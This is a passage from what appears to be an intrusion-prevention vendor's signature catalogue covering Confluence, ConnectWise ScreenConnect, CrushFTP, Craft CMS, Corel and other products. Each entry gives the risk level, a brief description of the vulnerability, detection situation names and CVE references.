HTTP_CSU-Confluence-Setupadministrator.action-Endpoint-Access
HTTP_CSU-Confluence-Access-Control-Vulnerability-CVE-2023-22515-2

References:

CVE-2023-22515
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22515

Confluence-Hardcoded-Credentials-CVE-2022-26138

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1502-5242

Last changed:

sgpkg-ips-1502-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

Hardcoded credentials in Confluence allow anyone to access it

Situation:

HTTP_CRL-Confluence-Hardcoded-Credentials-CVE-2022-26138

References:

CVE-2022-26138
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26138

Confluence-Improper-Authorization-CVE-2023-22518

About this vulnerability:

An attempt to exploit a vulnerability in Confluence detected

Risk:

High

First detected in:

sgpkg-ips-1648-5242

Last changed:

sgpkg-ips-1648-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

This improper authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to Confluence instance administrator leading to, but not limited to, full loss of confidentiality, integrity and availability. All versions of Confluence Data Center and Server are affected by this vulnerability. However, Atlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an "atlassian.net" domain, it is hosted by Atlassian and is not vulnerable to this issue.

Situation:

HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-1
HTTP_CSU-Confluence-Improper-Authorization-CVE-2023-22518-2
File-Text_Confluence-Improper-Authorization-CVE-2023-22518

References:

CVE-2023-22518
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22518

Confluence-OGNL-Injection-CVE-2021-26084

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1383-5242

Last changed:

sgpkg-ips-1383-5242

Platform:

Generic

Software:

Confluence

Type:

Code Injection

Description:

There exists an OGNL injection vulnerability in Confluence Server and Data Center. A successful exploitation of this vulnerability may lead to arbitrary code execution.

Situation:

HTTP_CRL-Confluence-OGNL-Injection-CVE-2021-26084

References:

CVE-2021-26084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26084

Confluence-OGNL-Injection-CVE-2022-26134

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1475-5242

Last changed:

sgpkg-ips-1495-5242

Platform:

Generic

Software:

Confluence

Type:

Code Injection

Description:

There exists an OGNL injection vulnerability in Confluence Server and Data Center. A successful exploitation of this vulnerability may lead to arbitrary code execution.

Situation:

HTTP_CSU-Suspicious-OGNL-Expression
HTTP_CSU-Suspicious-OGNL-Expression-2

References:

CVE-2022-26134
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134

Confluence-Path-Traversal-CVE-2019-3398

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1304-5242

Last changed:

sgpkg-ips-1304-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

There has been reported a path traversal vulnerability in Confluence Server and Confluence Data Center. Successful exploitation may allow a remote attacker with certain permissions to write files to arbitrary locations, which can lead to remote code execution on vulnerable versions of Confluence Server or Data Center.

Situation:

HTTP_CRL-Confluence-Path-Traversal-CVE-2019-3398

References:

CVE-2019-3398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3398

Confluence-Remote-Code-Execution-CVE-2019-3396

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1151-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Confluence

Type:

Input Validation

Description:

There has been reported a remote code execution vulnerability in Confluence Server and Data Center. A remote attacker can exploit this issue by injecting malicious code to the target service. Successful exploitation can lead in arbitrary code execution on the target server.

Situation:

HTTP_CRL-Confluence-Remote-Code-Execution-CVE-2019-3396

References:

CVE-2019-3396
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3396

Confluence-Template-Injection-CVE-2023-22527

About this vulnerability:

A vulnerability in Confluence

Risk:

High

First detected in:

sgpkg-ips-1678-5242

Last changed:

sgpkg-ips-1678-5242

Platform:

Generic

Software:

Confluence

Type:

Malfunction

Description:

A template injection vulnerability has been reported in Atlassian Confluence.

Situation:

HTTP_CRL-Confluence-Template-Injection-CVE-2023-22527

References:

CVE-2023-22527
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22527

Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709

About this vulnerability:

A vulnerability in ConnectWise ScreenConnect

Risk:

High

First detected in:

sgpkg-ips-1695-5242

Last changed:

sgpkg-ips-1695-5242

Platform:

Generic

Software:

ConnectWise ScreenConnect

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in ConnectWise ScreenConnect 23.9.7 and earlier.

Situation:

HTTP_CSU-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709
HTTP_CRL-Connectwise-Screenconnect-Authentication-Bypass-CVE-2024-1709-New-Account

References:

CVE-2024-1709
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1709

Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708

About this vulnerability:

A vulnerability in ConnectWise ScreenConnect

Risk:

High

First detected in:

sgpkg-ips-1697-5242

Last changed:

sgpkg-ips-1698-5242

Platform:

Generic

Software:

ConnectWise ScreenConnect

Type:

Input Validation

Description:

A directory traversal vulnerability has been reported in ConnectWise ScreenConnect. The vulnerability is due to improper validation of a zip file. Successful exploitation could result in code execution. While exploiting this vulnerability requires authentication, an attacker can first exploit CVE-2024-1709 in the same product to gain the required privileges.

Situation:

HTTP_CSU-Connectwise-Screenconnect-CVE-2024-1708-Post-Exploitation-Activity
File-Text_Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708

References:

CVE-2024-1708
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-1708

Conspy

About this vulnerability:	ConSpy
Risk:	Low
First detected in:	sgpkg-ips-615-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	ConSpy
Type:	Misconfiguration
Description:	ConSpy is an adware. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation:	HTTP_CSH-Conspy

Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption

About this vulnerability:

A vulnerability in Contaware FreeVimager

Risk:

Moderate

First detected in:

sgpkg-ips-501-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Contaware FreeVimager

Type:

Malfunction

Description:

A memory corruption vulnerability has been found in Contaware FreeVimager. The vulnerability is due to an error in processing GIF images containing an invalid value for the LZWMinimumCodeSize field. An attacker could exploit this vulnerability by enticing a target user to open a maliciously crafted GIF file with the vulnerable product. In the case of a successful attack, arbitrary attacker code could be executed in the security context of the target user.

Situation:

File-GIF_Contaware-Freevimager-GIF-Lzwminimumcodesize-Memory-Corruption

References:

BID-56869
http://www.securityfocus.com/bid/56869

OSVDB-88335
http://www.osvdb.org/88335

Contec-Conprossys-HMI-System-Chkformula-Command-Injection

About this vulnerability:

A vulnerability in Contec CONPROSYS HMI System (CHS)

Risk:

Moderate

First detected in:

sgpkg-ips-1546-5242

Last changed:

sgpkg-ips-1546-5242

Platform:

Generic

Software:

Contec CONPROSYS HMI System

Type:

Input Validation

Description:

Insufficient sanitation of user data used in commands causes a command injection vulnerability in Contec CONPROSYS HMI System. A successful exploitation allows an attacker to execute arbitrary commands on the target system.

Situation:

HTTP_CS-Contec-Conprossys-HMI-System-Chkformula-Command-Injection

References:

CVE-2022-44456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44456

Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection

About this vulnerability:

A vulnerability in Contec CONPROSYS HMI System (CHS)

Risk:

High

First detected in:

sgpkg-ips-1579-5242

Last changed:

sgpkg-ips-1579-5242

Platform:

Generic

Software:

Contec CONPROSYS HMI System

Type:

Input Validation

Description:

A SQL injection vulnerability has been reported in Contec CONPROSYS HMI System. The vulnerability is due to insufficient sanitization of user data used in CPostgreSQL.php. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in information disclosure in the target application's database.

Situation:

HTTP_CSH-Contec-Conprosys-HMI-System-Cpostgresql.php-SQL-Injection

References:

CVE-2023-1658
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1658

Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Contec CONPROSYS HMI System (CHS)

Risk:

Moderate

First detected in:

sgpkg-ips-1610-5242

Last changed:

sgpkg-ips-1610-5242

Platform:

Generic

Software:

Contec CONPROSYS HMI System

Type:

Input Validation

Description:

A stored cross-site scripting vulnerability exists in Contec CONPROSYS HMI System. The vulnerabilities is due missing parameter sanitization in multiple endpoints. A remote authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.

Situation:

File-Text_Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting

References:

CVE-2023-28651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28651

Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection

About this vulnerability:

A vulnerability in Contec CONPROSYS HMI System (CHS)

Risk:

Moderate

First detected in:

sgpkg-ips-1605-5242

Last changed:

sgpkg-ips-1605-5242

Platform:

Generic

Software:

Contec CONPROSYS HMI System

Type:

Input Validation

Description:

An SQL injection vulnerability has been reported in Contec CONPROSYS HMI System. The vulnerability is due to missing parameter sanitization processed by the query settings endpoint. A remote authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in potential arbitrary code execution.

Situation:

File-Text_Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection

References:

CVE-2023-29154
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29154

Content-After-Zero-Content-Length

About this vulnerability:	Content was detected after zero content lenght was indicated
Risk:	Moderate
First detected in:	sgpkg-ips-493-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Misconfiguration
Description:	Content was detected after zero content lenght was indicated
Situation:	HTTP_SHS-Content-After-Zero-Content-Length

Content-Encoding-Empty-Missing-Linefeed

About this vulnerability:	Content-Encoding header followed with carriage return but no line feed
Risk:	Low
First detected in:	sgpkg-ips-784-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Insecure Configuration
Description:	An HTTP reply header with immediate carriage return symbol but no linefeed may indicate inspection evading server behaviour.
Situation:	HTTP_SHS-Deflate-Gzip-With-Extra-Header

ContentKeeper-Web-Remote-Command-Execution

About this vulnerability:

A ContentKeeper Web Remote Command Execution vulnerability

Risk:

High

First detected in:

sgpkg-ips-803-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

ContentKeeper

Type:

Input Validation

Description:

A vulnerability in ContentKeeper, versions 125.09 and before, that allows remote attackers to write arbitrary data to default files and execute arbitrary commands via unathenticated access to certain binaries.

Situation:

HTTP_CRL-ContentKeeper-Web-Remote-Command-Execution

References:

OSVDB-54551
http://www.osvdb.org/54551

Cool-PDF-Image-Stream-Buffer-Overflow

About this vulnerability:

A Cool PDF Image Stream Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-800-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

CoolPDF Reader

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in Cool PDF Reader, version 3.0.2.256, which allows remote attackers to execute arbitrary code via a PDF file with a crafted stream.

Situation:

File-PDF_Cool-PDF-Image-Stream-Buffer-Overflow

References:

CVE-2012-4914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4914

OSVDB-89349
http://www.osvdb.org/89349

Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in CoolPDF Reader

Risk:

Moderate

First detected in:

sgpkg-ips-514-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

CoolPDF Reader

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in CoolPDF Reader. The vulnerability is due to insufficient validation of streams while processing PDF files. This can lead to a stack buffer overflow. A remote attacker can exploit this vulnerability by enticing an unsuspecting user to download and process a specially crafted PDF file, which can lead to code execution in the context of the affected application. If code execution is unsuccessful, the application may terminate abnormally.

Situation:

File-PDF_Coolpdf-Reader-Image-Stream-Processing-Buffer-Overflow

References:

CVE-2012-4914
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4914

BID-57461
http://www.securityfocus.com/bid/57461

OSVDB-89349
http://www.osvdb.org/89349

CoolPlayer-Playlist-File-Handling-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in CoolPlayer

Risk:

Moderate

First detected in:

sgpkg-ips-172-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

CoolPlayer

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in CoolPlayer. By persuading a user to open a crafted M3U playlist file with a vulnerable version of the affected application, a remote attacker can execute arbitrary code with the privileges of the currently logged in user.

Situation:

HTTP_SS-CoolPlayer-Playlist-File-Handling-Buffer-Overflow
File-Binary_CoolPlayer-Playlist-File-Handling-Buffer-Overflow

References:

CVE-2008-3408
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3408

BID-30418
http://www.securityfocus.com/bid/30418

OSVDB-47194
http://www.osvdb.org/47194

Coppermine-Photo-Gallery-picEditor.php-Command-Execution

About this vulnerability:

Coppermine Photo Gallery picEditor.php Command Execution Vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-643-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Coppermine Photo Gallery

Type:

Input Validation

Description:

A vulnerability exists in Coppermine Photo Gallery picEditor.php when the ImageMagick library is configured to be used. The variables 'quality', 'angle', and 'clipval' parameters are not properly sanitized allowing remote command execution.

Situation:

HTTP_CRL-Coppermine-Photo-Gallery-picEditor.php-Command-Execution

References:

CVE-2008-0506
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0506

BID-27512
http://www.securityfocus.com/bid/27512

OSVDB-41676
http://www.osvdb.org/41676

CoreHTTP-Url-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in CoreHTTP

Risk:

Moderate

First detected in:

sgpkg-ips-348-4219

Last changed:

sgpkg-ips-1589-5242

Platform:

Linux

Software:

CoreHTTP

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in CoreHTTP.

Situation:

HTTP_CSU-CoreHTTP-Url-Buffer-Overflow

References:

CVE-2007-4060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4060

BID-25120
http://www.securityfocus.com/bid/25120

OSVDB-46831
http://www.osvdb.org/46831

Corel-Multiple-Products-Multiple-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Corel CorelDRAW X7

Risk:

High

First detected in:

sgpkg-ips-631-5211

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Corel CorelDRAW X7; Corel Painter 2015; Corel PaintShop Pro X7; Corel PDF Fusion; Corel Photo-Paint X7; Corel CAD; Corel VideoStudio Pro X7; Corel FastFlick

Type:

Malfunction

Description:

Multiple insecure library loading vulnerabilities have been reported in multiple Corel products. The vulnerabilities are due to the insecure loading of a number of libraries. These include but are not limited to, Wintab32.dll, TD_Mgd_3.08_9.dll, wacommt.dll, and quserex.dll. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Corel-Multiple-Products-Multiple-Insecure-Library-Loading

References:

CVE-2014-8393
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8393

OSVDB-116981
http://www.osvdb.org/116981

Corel-Paintshop-Pro-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Corel PaintShop Pro

Risk:

Moderate

First detected in:

sgpkg-ips-546-5211

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Corel PaintShop Pro

Type:

Malfunction

Description:

There is a code execution vulnerability in Corel's PaintShop Pro. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to process an image file from a malicious source. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Corel-Paintshop-Pro-Insecure-Library-Loading

References:

CVE-2013-0733
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0733

BID-62836
http://www.securityfocus.com/bid/62836

OSVDB-98163
http://www.osvdb.org/98163

Corel-PDF-Fusion-Wintab32.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Corel PDF Fusion

Risk:

High

First detected in:

sgpkg-ips-534-5211

Last changed:

sgpkg-ips-1639-5242

Platform:

Generic

Software:

Corel PDF Fusion

Type:

Malfunction

Description:

A code execution vulnerability has been identified in Corel PDF Fusion. The vulnerability is due to an improper dynamic link library (DLL) search path leading to insecure library loading. A remote attacker could exploit this vulnerability by enticing a user to open a file from a directory, which also contains a malicious DLL. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

HTTP_CSU-Insecure-Microsoft-Library-Loading
SMB-TCP_CHS_Microsoft-Expression-Design-Insecure-Library-Loading-CVE-2012-0016

References:

CVE-2013-0742
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0742

OSVDB-94934
http://www.osvdb.org/94934

Corel-PDF-Fusion-XPS-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in Corel PDF Fusion

Risk:

Moderate

First detected in:

sgpkg-ips-538-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Corel PDF Fusion

Type:

Buffer Overflow

Description:

A code execution vulnerability exists in Corel PDF Fusion. The vulnerability is due to a stack buffer overflow when parsing names in ZIP directory entries of an XPS file. A remote attacker could exploit this vulnerability by enticing a user to open a crafted XPS file. A successful attack would result in execution of arbitrary code in the security context of the affected application.

Situation:

File-Zip_Long-Filename

References:

CVE-2013-3248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3248

BID-61010
http://www.securityfocus.com/bid/61010

OSVDB-94933
http://www.osvdb.org/94933

Corel-Wordperfect-Document-Processing-Buffer-Overflow

About this vulnerability:

A vulnerability in Corel WordPerfect Office X6

Risk:

Moderate

First detected in:

sgpkg-ips-518-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Corel WordPerfect Office

Type:

Buffer Overflow

Description:

A code execution vulnerability has been reported in Corel WordPerfect. The vulnerability is due to an error in wpwin16.exe while processing WordPerfect documents. This can lead to heap memory corruption. An attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted file with a vulnerable version of the application. This can lead to arbitrary code execution in the context of the affected application.

Situation:

File-Binary_Corel-Wordperfect-Document-Processing-Buffer-Overflow

References:

CVE-2012-4900
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-4900

OSVDB-91041
http://www.osvdb.org/91041

Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow

About this vulnerability:

A vulnerability in Corosync Cluster Engine

Risk:

Moderate

First detected in:

sgpkg-ips-1062-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Corosync Cluster Engine

Type:

Integer Overflow

Description:

There has been reported an integer overflow vulnerability in Corosync. A remote attacker could exploit this vulnerability and cause arbitrary code execution by sending a crafted packets to a target server.

Situation:

Generic_UDP-Corosync-Cluster-Engine-Totemcrypto.c-Integer-Overflow

References:

CVE-2018-1084
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1084

BID-103758
http://www.securityfocus.com/bid/103758

Corrupt-RTF-Header

About this vulnerability:	Detects a corrupted RTF header
Risk:	Low
First detected in:	sgpkg-ips-492-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Microsoft Office
Type:	Malfunction
Description:	A known corrupted header for RTF file has been detected. Could be used to hide malicious RTF content.
Situation:	File-Text_Corrupt-RTF-Header

Count.cgi-Vulnerabilities

About this vulnerability:

Count.cgi file disclosure and buffer overflow

Risk:

High

First detected in:

sgpkg-ips-253-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

Muhammad A. Muquit wwwcount

Type:

Buffer Overflow

Description:

The Count.cgi web access counter has a buffer overflow vulnerability. Successful exploit of this vulnerability leads to a remote system compromise.

Situation:

HTTP_CSU-Count-Cgi-BOF
HTTP_CSU-Count-Cgi-Disclosure

References:

CVE-1999-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0021

BID-128
http://www.securityfocus.com/bid/128

CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting

About this vulnerability:

A vulnerability in cPanel

Risk:

Moderate

First detected in:

sgpkg-ips-1590-5242

Last changed:

sgpkg-ips-1590-5242

Platform:

Generic

Software:

cPanel

Type:

Input Validation

Description:

A reflected cross-site scripting has been reported in cPanel. The vulnerability is due to improper validation of user input in ErrorPage module. A remote attacker can exploit the vulnerability by enticing the victim to open a maliciously crafted link. Successful exploitation could result in arbitrary script code execution in the victim's browser.

Situation:

HTTP_CRL-CPanel-Errorpage-Webcall-Id-Reflected-Cross-Site-Scripting

References:

CVE-2023-29489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29489

Craft-CMS-Remote-Code-Execution-CVE-2024-56145

About this vulnerability:

A vulnerability in Craft CMS

Risk:

High

First detected in:

sgpkg-ips-1825-5242

Last changed:

sgpkg-ips-1825-5242

Platform:

Generic

Software:

Craft CMS

Type:

Malfunction

Description:

A template injection vulnerability that allows unauthenticated remote code execution exists in Craft CMS. Versions prior to 3.9.14, 4.13.2, and 5.5.2 are vulnerable if register_argc_argv is enabled in the php.ini configuration file.

Situation:

HTTP_CSU-Craft-CMS-Remote-Code-Execution-CVE-2024-56145

References:

CVE-2024-56145
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-56145

Craft-CMS-Unauthenticated-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in Craft CMS detected

Risk:

High

First detected in:

sgpkg-ips-1730-5242

Last changed:

sgpkg-ips-1730-5242

Platform:

Linux; Unix

Software:

Craft CMS

Type:

Insecure Configuration

Description:

A vulnerability in Craft CMS, versions 4.0.0-RC1 through 4.4.14, which allows remote attackers to upload and execute arbitrary PHP code with the \craft\controllers\ConditionsController class by the use of an Imagick object with a VID scheme.

Situation:

HTTP_CRL-Craft-CMS-Unauthenticated-Remote-Code-Execution

References:

CVE-2023-41892
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41892

Cross-Site-Script-Encoder

About this vulnerability:	Generic detection for cross site scripting
Risk:	Moderate
First detected in:	sgpkg-ips-787-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	Any Software
Type:	Cross-site Scripting
Description:	Generic detection for cross-site scripts and encoder stubs. Exploit frameworks, such as Metasploit, generally use a library of cross-site scripts and encoders which are used by all generated exploits. Situations related to this vulnerability detect such sequences.
Situation:	DNS-UDP_SS-Cross-Site-Script-Encoder HTTP_CRL-Cross-Site-Script-Encoder SIP-UDP_Cross-Site-Script-Encoder

CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

About this vulnerability:

An attempt to exploit a vulnerability in CrushFTP detected

Risk:

High

First detected in:

sgpkg-ips-1655-5242

Last changed:

sgpkg-ips-1718-5242

Platform:

Generic

Software:

CrushFTP

Type:

Input Validation

Description:

CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes. The vulnerability allows attackers to read any files on the system as root via the webroot, but the file is deleted from its original location during the operation.

Situation:

HTTP_CS-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CS-CrushFTP-Potential-Improper-Modification-Of-Object-Attributes-CVE-2023-43177
HTTP_CRL-CrushFTP-Improper-Modification-Of-Object-Attributes-CVE-2023-43177

References:

CVE-2023-43177
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43177

CrushFTP-S3-Authentication-Bypass-CVE-2025-2825

About this vulnerability:

An attempt to exploit a vulnerability in CrushFTP detected

Risk:

High

First detected in:

sgpkg-ips-1861-5242

Last changed:

sgpkg-ips-1861-5242

Platform:

Generic

Software:

CrushFTP

Type:

Input Validation

Description:

CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability in the S3 authorization header processing that allows authentication bypass. Remote and unauthenticated HTTP requests to CrushFTP with known usernames can be used to impersonate a user and conduct actions on their behalf, including administrative actions and data retrieval.

Situation:

HTTP_CSH-CrushFTP-S3-Authentication-Bypass-CVE-2025-2825

References:

CVE-2025-2825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-2825

CrushFTP-Server-Side-Template-Injection-CVE-2024-4040

About this vulnerability:

An attempt to exploit a vulnerability in CrushFTP detected

Risk:

High

First detected in:

sgpkg-ips-1719-5242

Last changed:

sgpkg-ips-1719-5242

Platform:

Generic

Software:

CrushFTP

Type:

Input Validation

Description:

A server side template injection vulnerability in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows unauthenticated remote attackers to read files from the filesystem outside of the VFS Sandbox, bypass authentication to gain administrative access, and perform remote code execution on the server.

Situation:

HTTP_CRL-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040
HTTP_CSH-CrushFTP-Server-Side-Template-Injection-CVE-2024-4040

References:

CVE-2024-4040
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-4040

CryptoWall-Botnet

About this vulnerability:	CryptoWall botnet
Risk:	High
First detected in:	sgpkg-ips-659-5211
Last changed:	sgpkg-ips-1783-5242
Platform:	Generic
Software:	<os>
Type:	Code Injection
Description:	CryptoWall is a malicious botnet and is ransomware. After infecting the client, the bot encrypts personal files of the victim. The bot then displays a message asking the user to pay a ransom in order to obtain a key for decrypting his files. CryptoWall uses strong encryption and decryption is not possible without an appropriate key. However, it is also unclear if the attackers serve a valid key in case the ransom is paid. It is thus advised to restore file backups instead.
Situation:	HTTP_CRL-CryptoWall-Botnet-Traffic

Crypttech-CryptoLog-Remote-Code-Execution

About this vulnerability:	An attempt to exploit a Crypttech CryptoLog Remote Code Execution vulnerability detected
Risk:	High
First detected in:	sgpkg-ips-980-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Crypttech
Type:	SQL Injection
Description:	A vulnerability in Crypttech CryptoLog which allows remote attackers to execute SQL commands via one of the user supplied parameters, due to the lack of proper input validation.
Situation:	HTTP_CRL-Crypttech-CryptoLog-Remote-Code-Execution

Cstealer-Infection-Traffic

About this vulnerability:	Cstealer trojan infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Cstealer trojan infection traffic was detected.
Situation:	Generic_CS-Cstealer-Infection-Traffic

Ctek-SkyRouter-Command-Execution

About this vulnerability:

A Ctek SkyRouter Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-710-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ctek SkyRouter

Type:

Input Validation

Description:

A vulnerability in Ctek SkyRiuter 4200 and 4300, in apps/a3/cfg_ethping.cgi, which allows remote attackers to execute arbitrary commands via shell metacharacters in the PINGADDRESS parameter for a 'u' action.

Situation:

HTTP_CRL-Ctek-SkyRouter-Command-Execution

References:

CVE-2011-5010
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-5010

BID-50867
http://www.securityfocus.com/bid/50867

OSVDB-77497
http://www.osvdb.org/77497

CTL_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow

About this vulnerability:

A buffer overflow vulnerability in Cisco Systems Unified CallManager

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Cisco Systems Unified CallManager; Cisco Systems Unified Communications Manager

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in Cisco Unified Communications Manager. The flaw is due to a logic error in the Certificate Trust List (CTL) Provider service when processing client requests. A remote unauthenticated attacker can trigger this vulnerability by sending crafted message to the target server. Successful attack could allow for raising a denial of service condition or injecting and executing arbitrary code with the privileges of the affected service.

Situation:

Generic_Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow
TLS_CS-Cisco-Unified-Communications-Manager-CTL-Provider-Heap-Overflow

References:

CVE-2008-0027
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0027

BID-27313
http://www.securityfocus.com/bid/27313

CUPS-Gif-Decoding-Routine-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Common UNIX Printing System (CUPS)

Risk:

High

First detected in:

sgpkg-ips-149-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Common UNIX Printing System

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Common Unix Printing System (CUPS). The vulnerability is due to a boundary error in the handling of GIF format files and may be exploited by remote attackers to compromise a vulnerable system or cause a denial of service.

Situation:

HTTP_CS-CUPS-Gif-Decoding-Routine-Buffer-Overflow

References:

CVE-2008-1373
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

BID-28544
